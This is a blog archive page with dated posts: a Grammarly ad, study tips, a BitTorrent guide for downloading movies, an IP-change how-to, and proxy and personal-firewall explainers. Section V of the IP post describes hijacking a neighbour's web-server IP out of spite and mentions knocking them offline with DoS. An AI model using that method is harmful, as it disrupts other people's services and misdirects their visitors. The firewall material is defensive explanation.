mIKKImAX: All About

Showing posts with label All About. Show all posts

Sunday, March 3, 2013

Get a FREE 7-day trial Correct Your Grammar and Spellings

While speaking in English we don’t need to give more importance to the grammar but when it comes to writing, Grammar is really important. Even for a simple document, the grammar needs to be perfect. Especially for writers, grammar is a major factor while preparing their documents. Even for professionals, there may be some grammar mistake while preparing documents in a hurry. In order to avoid these type of grammatical errors there are plenty of online and offline applications available but the accuracy matters when it comes to grammar checking.

Grammarly is a new web application for checking grammar on the documents you write. Unlike other applications, it has plenty of features and variety of grammar checking options for different type of documents. This will be very helpful for students, job seekers and people who send lots of emails everyday. A document without grammar errors will create a good impression also it will give more confidence on your work. Grammarly team says, once you start scanning your document with the application it checks around 250 points of grammar on your document. It will not abruptly change your document, just it will suggest the changes can be made. Either you can accept it and change or you can ignore and proceed further.

Grammarly also helps you to enhance your sentences by suggesting new words for the existing ones. It has an excellent inbuilt context optimized synonyms to give a better readability of your documents. The spell checker in the application will help you find the difference between commonly confusing words like lose/loose, affect/effect, etc. You don’t need to download any software to use Grammarly on your computer. Just Sign up for the application with your email id and start using it in your browser and other desktop applications like Microsoft word, Outlook, etc.

It is a premium application, the trial period is available only for seven days after that you need to select a plan to continue further. Once you sign up, the plans list will be available on the application itself. It will also help you improve the writing skills by avoiding the common mistake you commit. Grammarly will understand the mistakes you make often and helps you get rid of that. The results are very quick so that you don’t need to spend a lot of time in proof reading your document. The inbuilt proof reading software has got plenty of positive reviews from users and many writers.

Get a FREE 7-day trial

http://www.grammarly.com/

Friday, November 18, 2011

Top Ten Tips for Increasing Concentration

1. Start assignments with some curiosity about the material and a positive attitude toward learning.

2. Designate a place where you go only to study. Use proper lighting.

3. Identify your distractions. Find ways to decrease them or to postpone them until study breaks (e.g., taking the phone off the hook, turning off instant messenger).

4. Decrease noises around you while studying. If you need some background music it should be soft. Keep the TV off.

5. Use "active study" techniques: sit straight in a chair at a desk, start out with questions about the material, outline chapters, underline key phrases after reading a section, write notes in margins, ask yourself what you have learned.

6. Divide your work into smaller manageable tasks that can be completed in a short period of time. Push yourself to complete one small task, then move on to the next task. Focus on one small task at a time.

7. Use times of peak alertness for studying difficult or less interesting topics. When you are tired or hungry concentration will be lowered.

8. When your mind starts to wander come up with some cue words to say to yourself (e.g., "Focus." "Get back on task.") to focus your concentration again.

9. Take breaks when you have completed tasks or when you feel concentration has decreased. Breaks should be approximately 10-15 minutes.

10. If you have other assignments or issues on your mind write them down on a "to do" list or take a small step to deal with them. Then get back to focusing on the task at hand.

HINDI SHER

clip_image001

Saturday, October 30, 2010

HOW TO DOWNLOAD MOVIES BY BITTORRENT

Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Tuesday, October 19, 2010

IP ADDRESS CHANGE HOW TO

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.
1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".
2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:

Windows IP Configuration:
Host Name . . . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . . . :
Node Type . . . . . . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x
Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . . . . . . : Yes
IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0
Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM
This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.

III. Changing your IP Address
To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usualy a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.

IV. DDoS & DoS Protection
If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above.

V. Web servers & Other Services
If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.
To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get pissed ;)

What is a Proxy Server?

A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. The data you request come to the proxy first, and only then it transmits the data to you. I know many are looking for IP Maskers or Scramblers, but honestly, it aint real easy for the simple fact that any website that you visit needs your IP to send the info packets too. If its scrambled, you will get alot of errors and crazy redirects :P My solution? Read on........... for a good list of Proxy servers try here>> http://www.multiproxy.org/

Why do I need to use proxy servers?
Transfer speed improvement. Proxy servers accumulate and save files that are most often requested by thousands of Internet users in a special database, called “cache”. Therefore, proxy servers are able to increase the speed of your connection to the Internet. The cache of a proxy server may already contain information you need by the time of your request, making it possible for the proxy to deliver it immediately.

Security and privacy. Anonymous proxy servers that hide your IP address thereby saving you from vulnerabilities concerned with it.
Sometimes you may encounter problems while accessing to web server when server administrator restricted access from your IP or even from wide IP range (for example restricting access from certain countries or geographical regions). So you try to access those pages using an anonymous proxy server.

What is a public proxy server?
It is a proxy server which is free and open for everybody on the Internet. Unfortunately most of them are not anonymous.
Free service trying to provide list of public HTTP proxy servers. Usually provide small list of proxies with low percent of functioning servers due to hosting restrictions on CPU time (they simply can't allow themselves to check many proxies every second especially in parallel).

The Solution?
When using an anonymous proxy server you don’t give a anybody chance to find out your IP address to use it in their own interests. ;) If there is a need to make an (inner) proxy connect to the outside world via another (outer) proxy server, you can use the same environment variables as are used to redirect clients to the proxy to make inner proxy use the outer one:
http_proxy
ftp_proxy
gopher_proxy
wais_proxy
E.g. your (inner) proxy server's startup script could look like this:
#!/bin/sh
http_proxy=http://outer.proxy.server:8082/
export http_proxy
/usr/etc/httpd -r /etc/inner-proxy.conf -p 8081
This is a little ugly, so there are also the following directives in the configuration file:
http_proxy http://outer.proxy.server/
ftp_proxy http://outer.proxy.server/
gopher_proxy http://outer.proxy.server/
wais_proxy http://outer.proxy.server/

What is a Firewall? ALL ABOUT FIREWALL

A firewall is a tool that monitors communication to and from your computer. It sits between your computer and the rest of the network, and according to some criteria, it decides which communication to allow, and which communication to block. It may also use some other criteria to decide about which communication or communication request to report to you (either by adding the information to a log file that you may browse whenever you wish, or in an alert message on the screen), and what not to report.
What Is It Good For?

Identifying and blocking remote access Trojans. Perhaps the most common way to break into a home computer and gain control, is by using a remote access Trojan (RAT). (sometimes it is called "backdoor Trojan" or "backdoor program". Many people simply call it a "Trojan horse" although the term "Trojan horse" is much more generic). A Trojan horse, is a program that claims to do something really innocent, but in fact does something much less innocent. This goes to the days where the Greek soldiers succeeded to enter through the gates of Troy by building a big wooden horse, and giving it as a present to the king of Troy. The soldiers allowed the sculpture to enter through their gates, and then at night, when the soldiers were busy guarding against an outside attack, many Greek soldiers who were hiding inside the horse went out and attacked Troy from the inside. This story, which may or may not be true, is an example of something which looks like something innocent and is used for some less innocent purpose. The same thing happens in computers. You may sometimes get some program, via ICQ, or via Usenet, or via IRC, and believe this program to be something good, while in fact running it will do something less nice to your computer. Such programs are called Trojan horses. It is accepted to say that the difference between a Trojan horse and a virus, is that a virus has the ability to self-replicate and to distribute itself, while a Trojan horse lacks this ability. A special type of Trojan horses, is RATs (Remote Access Trojans, some say "remote admin Trojans"). These Trojans once executed in the victim's computer, start to listen to incoming communication from a remote matching program that the attacker uses. When they get instructions from the remote program, they act accordingly, and thus let the user of the remote program to execute commands on the victim's computer. To name a few famous RATs, the most common are Netbus, Back-Orifice, and SubSeven (which is also known as Backdoor-G). In order for the attacker to use this method, your computer must first be infected by a RAT.

Prevention of infections by RATs is no different than prevention of infection by viruses. Antivirus programs can identify and remove most of the more common RATs. Personal firewalls can identify and block remote communication efforts to the more common RATs and by thus blocking the attacker, and identifying the RAT.

Blocking/Identifying Other Types of Trojans and WQorms?
There are many other types of Trojan horses which may try to communicate with the outside from your computer. Whether they are e-mail worms trying to distribute themselves using their own SMTP engine, or they might be password stealers, or anything else. Many of them can be identified and blocked by a personal firewall.

Identifying/Blocking Spyware's/Adbots?
The term "spyware" is a slang which is not well defined. It is commonly used mainly for various adware (and adware is a program that is supported by presenting advertisements to the user), and that during their installation process, they install an independent program which we shall call "adbot". The adbot runs independently even if the hosting adware is not running, and it maintains the advertisements, downloads them from the remote server, and provides information to the remote server. The adbot is usually hidden. There are many companies that offer adbots, and advertisements services to adware. The information that the adbots deliver to their servers from the computer where the adbot is installed, is "how much time each advertisement is shown, which was the hosting adware, and whether the user clicked on the advertisement. This is important so that the advertisements server will be able to know how much money to get from each of the advertised companies, and how much from it to deliver to each of the adware maintainers. Some of the adbots also collect other information in order to better choose the advertisements to the users. The term "spyware" is more generic, but most of the spyware fall into this category. Many types of adbots can be identified and blocked by personal firewalls.
Blocking Advertisements?
Some of the better personal firewalls can be set to block communication with specific sites. This can be used in order to prevent downloading of advertisements in web pages, and thus to accelerate the download process of the web sites. This is not a very common use of a personal firewall, though.
Preventing Communication to Tracking Sites?
Some web pages contain references to tracking sites. e.g. instruct the web browser to download a small picture (sometimes invisible) from tracking sites. Sometimes, the pictures are visible and provide some statistics about the site. Those tracking sites will try to save a small text either as a small file in a special directory, or as a line in a special file (depending on what is your browser), and your browser will usually allow the saving site to read the text that it saved on your computer. This is called "web cookies" or sometimes simply "cookies". Cookies allow a web site to keep information that it saved some time when you entered it, to be read whenever you enter the site again. This allow the web site to customize itself for you, and to keep track on everything that you did on that site. It does not have to keep that information on your computer. All it has to save on your computer is a unique identifying number, and then it can keep in the server's side information regarding what has been done by the browser that used that cookie. Yet, by this method, a web site can get only information regarding your visits in it. Some sites such as "doubleclick" or "hitbox" can collect information from various affiliated sites, by putting a small reference in the affiliated pages to some picture on their servers. When you enter one of the affiliated web pages, your browser will communicate with the tracking site, and this will allow the tracking site to put or to read a cookie that identifies your computer uniquely, and it can also know what was the web page that referred to it, and any other information that the affiliated web site wanted to deliver to the tracking site. This way tracking sites can correlate information from many affiliated sites, to build information that for example will allow them to better customize the advertisements that are put on those sites when you browse them.
Some personal firewalls can be set to block communication to tracking sites. It is not a common use of a personal firewall, though, and a personal firewall is not the best tool for that, but if you already have one, this is yet another possible use of it.
Blocking or Limiting the NetBIOS Communication? (as well as other default services)
The two common methods of intruders to break into home computers, are through a RAT (which was discussed in II.3a) and through the NetBIOS communication. The NetBIOS is a standard for naming computers in small networks, developed long ago by IBM and Microsoft. There are a few communication standards which are used in relation to the NetBIOS. The ones that are relevant for Microsoft Windows operating systems, are: NBT (NetBIOS over TCP/IP), IPX/SPX, and NetBEUI. The communication standard which is used over the Internet, is NBT. If it is enabled, and there is no firewall or something else in the middle, it means that your computer is listening for communications over the Internet via this standard, and will react according to the different NBT commands that it gets from the remote programs. It is thus that the NBT (which sometimes loosely called "NetBIOS") is acting as a server. So the next question should be "what remote NBT commands the NBT server will do on the local computer". The answer to this question depends on the specific setting on your computer. You may set your computer to allow file and print sharing. If also NBT is enabled, it means that you allow remote users to share your files or printers. This is a big problem. It is true that in principle the remote user has to know your password for that computer, but many users do not set a password for their user on Windows, or set a trivial password. Older versions of Win95 had file and print sharing over NetBIOS enabled by default. On Win98, and WinMe it was disabled by default, but many technicians, when they set a home network, they enable the file and print sharing, without being aware that it influences also the authorizations of a remote Internet user. There are even worms and viruses who use the File sharing option to spread in the Internet. Anyway, no matter whether you need it for some reason or just are not aware of it, a personal firewall can identify and block any external effort to communicate with the NetBIOS server on your computer. The more flexible personal firewalls can be set to restrict the authorization to communicate with the NetBIOS. Some Windows operating systems, especially those which are not meant for home uses, offer other public services by default, such as RPC. A firewall can identify communication efforts to them, and block them. Since such services listen to remote communications, there is a potential risk when there are efforts to exploit security holes in the programs that offer the services, if there are such security holes. A firewall may block or limit the communication to those services.
Hiding Your Computer on the Internet?
Without a firewall, on a typical computer, even if well maintained, a remote person will still be able to know that the communication effort has reached some computer, and perhaps some information about the operating system on that computer. If that computer is handled well, the remote user will not be able to get much more information from your computer, but might still be able to identify also who your ISP is, and might decide to invest further time in cracking into your computer.
With a firewall, you can set the firewall so that any communication effort from remote users (in the better firewalls you may define an exception list) will not be responded at all. This way the remote user will not be able to even know that it reached a live computer. This might discourage the remote attacker from investing further time in effort to crack into your computer.

The Non-Firewall Defenses
We've discussed a few situations where a personal firewall can provide defense. Yet, in many cases a computer maintainer can deal with those situations even without a firewall. Those "alternative" defenses, in many cases are recommended regardless of whether you use a firewall or not.
Remote Access Trojans?
The best way to defend against remote access Trojans (RATs) is to prevent them from being installed in the first place on your computer. A RAT should first infect your computer in order to start to listen to remote communication efforts. The infection techniques are very similar to the infection techniques that viruses use, and hence the defense against Trojan horses is similar to the defense against viruses. Trojan horses do not distribute themselves (although they might be companions of another Internet worm or virus that distributes them. Yet, because in most cases they do not distribute themselves, it is likely that you will get them from anonymous sources, such as instant messengers, Kazaa, IRC, or a newsgroup. adopting a suspicious policy regarding downloads from such places, will save you not only from viruses but also from getting infected with Trojan horses, including RATs. Because Trojan horses are similar in some ways to viruses, almost all antivirus programs can identify, block from being installed, and remove most of the Trojan horses, including all the common ones. There are also some programs (sometimes called antiTrojan programs) which specialize in the identification and removal of Trojan horses. For a list of those programs, and for comparison on how well different antivirus, and antiTrojan programs identify different Trojan horses, see Hackfix (http://www.hackfix.org), under "Software test results". Hackfix also has information on the more common RATS (such as the Netbus and the Subseven) and on how to remove them manually. There are some tools and web sites, such port scanners, and some ways with a use of more generic tools such as telnet, msconfig, and netstat, which may help you to identify a RAT.

Other types of Trojans and worms?
Also here your main interest should be to prevent them from infecting your computer in the first place, rather than blocking their communication. A good antivirus and a good policy regarding the prevention of virus infections, should be the first and most important defense.
Spyware and Adbots?

The term spyware is sometimes misleading. In my view, it is the responsibility of the adware developer to present the fact that the adware installation will install or use an independent adbots, and to provide the information on how this adbot communicates, and which information it delivers, in a fair place and manner before the adware is installed. It is also a responsibility to provide this information in their web sites, so that people will be aware of that before they even download the software. Yet, in general, those adbots do not pose any security threat, and in many cases also their privacy threat is negligible for many people (e.g. the computer with adbot number 1127533 has been exposed to advertisements a, b, c, such and such times, while using adware x, while on computer with adbot number 1127534 has been exposed to advertisements a,d, and e, such amount of time, with the use of adware y, and clicked on ads number d). It should be fully legitimate for software developers to offer an advertisement supported programs, and it is up to the user to decide whether the use of the program worth the ads and the adbot, or not. Preventing adbot from communicating is generally not a moral thing. If you decide to use an adware, you should pay the price of letting the adbot work. If you don't want it, please remove the adware, and only if for some reason the adbot continue to work even if no hosting adware that uses it is installed, you may remove the adbot. Anyway, there are some very useful tools to identify whether a program is a "spyware", or whether a "spyware" is installed on your computer, and you are certainly entitled to this information. Two useful programs are "AdAware" which identifies "spyware" components on your computer and allows you to remove them, and Ad-Search which allows you to provide a name of a program, and it tells you whether this program is a "spyware" and which adbot it uses. It is useful to assist you in choosing whether to install a program or not. You may find those programs in http://www.lavasoft.nu (or, if it doesn't work, you may try http://www.lavasoftusa.com). Those programs are useful, mainly because many adware developers are not fair enough to present this information in a fair manner. AdAware allows you to also remove those adbot components from your computer. This might, however, terminate your license to use the hosting adware programs, and might even cause them to stop functioning. A website which offers to check whether a specific program that you wish to install is "spyware" or not, is http://www.spychecker.com .

Blocking Advertisements?
Leaving aside the moral aspect of blocking advertisements, a personal firewall is not the best tool for that anyway. This is not the main purpose of a firewall, and neither its main strength. Some of them can block some of the advertisements from being downloaded, if you know how to configure them for that. Yet, there are better tools for that, such as Proxomitron (http://www.proxomitron.org), CookieCop 2 (search for the word cookiecop on http://www.pcmag.com), or Naviscope (http://www.naviscope.com), and there are many other programs as well. You may check for other alternatives, e.g. in Tucows (http://www.tucows.com/adkiller95.html).

Blocking Tracking Sites?
Also here, a personal firewall is not the best tool for that, and there are other tools and ways which are more effective. These are cookie utilities. Since a tracking site uses a cookie to identify and relate the information gathered to the same person (or computer), by preventing the cookie from being installed. The tracking site will lose its ability to track things. There are plenty of cookie management utilities. Some of them are freeware, and some are not. CookieCop which was mentioned in the former section is one of them. WebWasher (http://www.webwasher.com) is another recommended one, and there are plenty of other alternatives such as cookie-crusher, cookie-pal, pop-up killer, etc. You may search for other alternatives, in Tucows (http://www.tucows.com/cookie95.html).
NetBIOS and Other Services?

The NetBIOS over TCP/IP (NBT) which is sometimes loosely called "NetBIOS", is a service which has some security problems with it. It is enabled by default in Windows default installations, and it is very common to see that a firewall does the job of preventing the efforts to get access to your computer via NBT. Yet, in almost all cases, this service is not needed, and thus can be disabled. To disable NBT in Win95/98/ME is not as simple as it is in Win2K/XP, but can still be done reliably. We explain how to do this in another article (#to be written soon). It is needless to say, that if NBT is disabled, there is no need for a firewall to block communication to it. Also, in the case of other services, such as RPC services, and others, in many cases you simply don't need those services and better disable them from within Windows rather than use the firewall to block them. There are various ways to know which services are running on your computer, and which of them are listening for communications from the outside. If there are ones that you don't need, they should be disabled.

Hiding the Computer?
In web sites of many personal firewall companies, they are putting a lot of weight on the ability of their firewall to hide the computer on the Internet. Yet, exposing your home computer on the Internet is by itself, neither a security nor a privacy threat. If you provide some services to the Internet on your computer, for example, you put a web server on your computer to allow other people to view web pages, then you might get rid of some of the crackers, by setting your firewall to unhide only this type of communications. Some attackers will not make a full scan of your computer, but only a partial scan, and if they did not scan for the specific service that you provided, they will not see your computer. Yet, if the service is a common one, there is a good chance for many of them to scan it and thus find the existence of your computer. If they "see" the existence of your computer, they might decide to scan it further, and find out the services you are providing, and scan it for security holes to use. Yet, there is no much meaning to it when we speak about simple home computers.

What a Firewall Cannot Do!
Another misconception about personal firewalls is that they are incorrectly thought as if they claim to give an overall protection against "hackers" (i.e. intrusions). They are not.

Defense Against Exploitation of Security Holes
A firewall can allow or deny access to your computer or from your computer according to the type of communication, its source and destination, and according to the question which program on your computer is handling the communication. Yet, its ability to understand the details of the communication is very limited. For example, you may set the firewall to allow or to deny your e-mail program from getting and/or sending messages. It may allow or deny your web browser from browsing the Internet. But if you allowed your e-mail program to communicate with the e-mail servers for sending and receiving messages, (and you are likely to allow it if you want to use your e-mail program), or if you set the firewall to allow your web browser to communicate with web sites, the firewall will not be able to understand the content of the communication much further, and if your web browser has a security hole, and some remote site will try to exploit it, your firewall will not be able to make a distinction between the communication that exploits the security hole, and legitimate communication. The same principle goes with e-mail program. A personal firewall may block you from receiving or sending e-mail messages, but if you allowed it to receive messages, the personal firewall will not make a distinction between a legitimate message and a non-legitimate one (such as a one that carries a virus or a Trojan horse). Security holes in legitimate programs can be exploited and a personal firewall can do practically nothing about it.

I should comment, however, that some personal firewalls come combined with some Trojan horse detection, or intrusion detection. This is not part of the classical definition of a firewall, but it might be useful. Such tasks are usually taken by other tools such as antivirus programs or antiTrojan programs.
Tricks to Bypass or Disable Personal Firewalls
There are also various ways to disable, or bypass personal firewalls. During the time a few tricks to bypass or disable were demonstrated by various programs. Especially, tricks for an internal program to communicate with the outside bypassing or tricking the firewall. For some of them such as the one demonstrated by the Leaktest, and in which a non-legitimate program disguises itself as Internet Explorer, practically today, all personal firewalls are immuned. For other tricks, such as a one demonstrated by Outbound, which uses some non-standard type of communication directly to the network adapters bypassing the components of the operating system which are suppose to deal with Internet communication, and by that bypassing the firewall, are only now being patched against by the various firewalls, and yet other methods, such as the one demonstrated by Tooleaky, which uses Internet Explorer as a messenger to communicate with the outside, and is thus identified as a mere legitimate browsing, are still waiting for most of the personal firewall to find a fix.

Firewalls CANNOT Decide for You What is a Legitimate Communication and What is Not
One of the main problems with personal firewalls, is that you cannot simply install them and forget them, counting on them to do their job. They can deny or permit various types of communications according to some criteria, but what is this criteria, and who decides what is the criteria for whether they should permit or deny some communication?
The answer, is that it is the computer user's job to define the exact criteria when the firewall should allow a communication and when it should block it. The firewall may make it easier for you, but it should not take the decisions. There are too many programs, too many versions, and it is not possible for the firewall to decide accurately when a communication is legitimate and when it is not. One person might think that it is legitimate for some program to deliver some information to the outside in order to get some service, while another will think that it is not. One version of a program might communicate with its home server in order to check whether there is an upgrade, and another version might also install the upgrade even if you do not wish. Some firewalls will try to identify communication efforts which are largely considered as legitimate, and will let you the information so that it will be easier for you to decide whether such should be allowed. Others will suffice with more basic information, making no suggestions (and thus - no incorrect recommendations). One way or another, once you installed a firewall, you will have better means to understand what types of communications are running on your computer, but you will also have to understand them in order to be able to configure your firewall so that it will correctly know which communications to allow and which to block.

Common Problems and Deficiencies Regarding Personal Firewalls
A personal firewall might be a good contribution to security. Yet, if you do not understand much about the topic, then you are likely to be confused and misled by its alerts and queries, and thus find yourself spending hours in chasing after imaginary crackers, fear from imaginary threats, and misconfigure it due to misunderstanding. You may find yourself blocking legitimate and important communication believing it to be cracking efforts, and thus surprised to see why things work slowly or why you are disconnected from the Internet, or you might be misled to allow a non-legitimate communication by some software that tricked you to believe that it is a legitimate one. On the other side, if you are quite knowledgeable on computers and security, then you are likely to effectively defend your computer even without a firewall (by means discussed in section II.4) and it is thus that the role of personal firewall in securing your computer, is extremely small and not much important. We discuss here in brief some of the problems that personal firewalls may generate.

A False Sense of Security
As we've already learned here, a firewall is limited in its ability to secure your computer. Yet, many people believe that if they will install a personal firewall they will be secured against the various security threats. I was even surprised to find out that there are people who believe that give much higher priority in installing a personal firewall than in installing an antivirus program. An always updated antivirus program plays a much more important role in the security of a personal home computer than installing and maintaining a personal firewall. A personal firewall should not come on account of any other security measure that you use.

A False Sense of Insecurity
When you install a firewall and you look at all the communication efforts through it, you might be surprised at the amount of communication efforts from the Internet to your computer. Most of them are blocked by a typically configured firewall. There are all the times efforts to try to communicate with various backdoor Trojans on your computers. If you are not infected, there will be nothing to listen and to respond to those communication efforts, and they are thus practically harmless. There are efforts to communicate with your NBT driver, to see if your computer by mistake allows file sharing. There are other types of probes to see if your computer exists, or various efforts of servers to probe your computer in order to find the best path for legitimate communication to it. There are sometimes remnants of communications that were supposed to go to other computers, but made their way to yours (for advanced readers: because the IP number that your computer uses, were used by some other computer earlier). Those communication efforts are blocked even without a firewall. If your computer is not infected with a RAT, and if your computer don't have NetBIOS over TCP/IP enabled or even it does not have file and print sharing enabled (and on most computers this is disabled by default), then none of these pose any security threat. If your computer is not infected with a SubSeven Trojan, then no matter how often there will be efforts to communicate with it, they are all doomed to be failed.
Yet, some personal firewall (such as Norton Personal Firewall or ZoneAlarm) by default proudly announce that they have just blocked an effort to crack into your computer. Norton may even define those efforts that were blocked as "high security threats" while they were not a threat at all even if your computer didn't have a personal firewall at all. Such firewalls give you the false impression that they save your computer again and again from extremely dangerous threats on the Internet, so that you wonder how did you survive so much time without noticing any intrusion before you installed the firewall. I usually say, that those personal firewalls are set their "report level" to "promotional mode". Namely, the personal firewall is set to give you the false impression that it is much more important than it really is.

Chasing After Ghosts
This is a side effect of the types of misunderstandings that were discussed in the previous subsection.
When a person who starts to learn about the jargon related to personal firewalls, is reported that some "dangerous" communication efforts persist from the same source, the person is decisive to locate and identify the "hacker", and perhaps report about it to the police or to its Internet service provider. However, since many people do not really understand thoroughly how things work, they may sometimes spend many hours in trying to locate a cracker that does not exist, or when the knowledge they need to have, in order to track the cracker, is much higher than what they have, and they might even suspect the wrong person due to lack of knowledge (e.g. the connection person on the Internet service provider that was used by the cracker). More knowledgeable people, usually do not bother to track those "hackers" (which are usually teenagers), but instead are concentrating on the security of their computer.
Blocking Legitimate Communications

No personal firewall is smart enough to decide for the user what is a legitimate communication and what is not. A personal firewall cannot make a distinction between a legitimate program trying to contact its server to check and notify the user when there is a newer version, and a non-legitimate program trying to communicate with its server in order deliver sensitive information such as passwords, unless the user tells it. It is thus up to the user to decide what should be considered as legitimate and what should not. Yet, can we count on the user to be knowledgeable enough to decide what is legitimate and what is not? In many cases the user is not knowledgeable enough, and may thus allow non-legitimate communication or disallow a legitimate and important communication. There are many types of communications handled just to manage other communications. Among this are various types of communications between your computer and the various servers of your Internet service provider. A not knowledgeable user may interpret those types of communications as cracking efforts, and will thus decide to block them. As a result, a connection might become slower, a connection to the Internet service provider might be disconnected quiet often and other types of communication problems.

Being Tricked by Trojans bbb
Just as less knowledgeable users may instruct the firewall to block legitimate communications, they can be tricked by various Trojans to allow them to communicate. Some Trojans are using names resembling or identical to names of legitimate programs, so that the user would think that it is a legitimate programs. Users should be aware of that.

Heavy Software, Buggy Software
